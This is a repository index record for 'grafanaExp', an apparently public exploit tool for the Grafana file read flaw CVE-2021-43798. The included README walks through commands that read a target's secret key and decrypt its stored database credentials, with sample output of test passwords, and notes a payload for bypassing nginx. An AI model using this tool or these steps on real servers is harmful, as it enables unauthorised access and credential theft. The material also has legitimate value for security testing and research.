{"id":15481834,"url":"https://github.com/a-d-team/grafanaexp","last_synced_at":"2025-04-09T21:17:52.596Z","repository":{"id":90381161,"uuid":"435926848","full_name":"A-D-Team/grafanaExp","owner":"A-D-Team","description":"A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins / extract secret_key / decrypt data_source info automatic.","archived":false,"fork":false,"pushed_at":"2024-07-12T14:17:27.000Z","size":476,"stargazers_count":256,"open_issues_count":1,"forks_count":33,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-04-09T21:17:46.602Z","etag":null,"topics":["cve-2021-43798","exploit","grafana"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/A-D-Team.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-12-07T15:11:34.000Z","updated_at":"2025-04-06T11:35:05.000Z","dependencies_parsed_at":"2023-11-07T05:35:11.380Z","dependency_job_id":null,"html_url":"https://github.com/A-D-Team/grafanaExp","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-D-Team%2FgrafanaExp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-D-Team%2FgrafanaExp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-D-Team%2FgrafanaExp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-D-Team%2FgrafanaExp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/A-D-Team","download_url":"https://codeload.github.com/A-D-Team/grafanaExp/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248111973,"owners_count":21049578,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-43798","exploit","grafana"],"created_at":"2024-10-02T05:06:32.642Z","updated_at":"2025-04-09T21:17:52.564Z","avatar_url":"https://github.com/A-D-Team.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# grafanaExp\n\n利用grafana CVE-2021-43798任意文件读漏洞，自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件，并输出`data_sourrce`信息。\n\n## 使用方法\n提供exp和decode功能。\n```\n➜  ./grafanaExp -h\nNAME:\n   grafanaExp - Exploit Grafana with CVE-2021-43798 Arbitrary File Read.\n\nUSAGE:\n   grafanaExp [global options] command [command options] [arguments...]\n\nAUTHOR:\n   A\u0026D-Team\n\nCOMMANDS:\n   exp      -u [url] -p [plugin] -c [config] -d [db] -k [key]\n   decode   decode -f [dbfile] -k [key]\n   help, h  Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n   --help, -h  show help (default: false)\n\n```\n\n### Exp\n自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件，并输出`data_souce`信息：\n```\n➜  ./grafanaExp exp -u http://localhost:3000/ \n2021/12/07 22:19:10 Target vulnerable has plugin [alertlist]\n2021/12/07 22:19:10 Get secret_key [SW2YcwTIb9zpOOhoPsMm]\n2021/12/07 22:19:10 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]\n2021/12/07 22:19:10 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]\n2021/12/07 22:19:10 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]\n2021/12/07 22:19:10 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]\n2021/12/07 22:19:10 All Done, have nice day!\n\n```\n\n### Decode\n当DB文件太大的时候，可先下载到本地，之后再本地解密：\n```\n➜ ./grafanaExp decode -f grafana.db -k SW2YcwTIb9zpOOhoPsMm\n2021/12/07 23:00:20 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]\n2021/12/07 23:00:20 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]\n2021/12/07 23:00:20 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]\n2021/12/07 23:00:20 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]\n```\n\n## 更新\n```\n1、支持https （昨天没加因为 transport会有一些奇奇怪怪的问题\n2、增加darwin的执行文件\n3、增加绕过nginx的paylaod （裸改了一下net/http\n```\n\n## 申明\n\n本程序应仅用于授权的安全测试与研究目的\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fa-d-team%2Fgrafanaexp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fa-d-team%2Fgrafanaexp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fa-d-team%2Fgrafanaexp/lists"}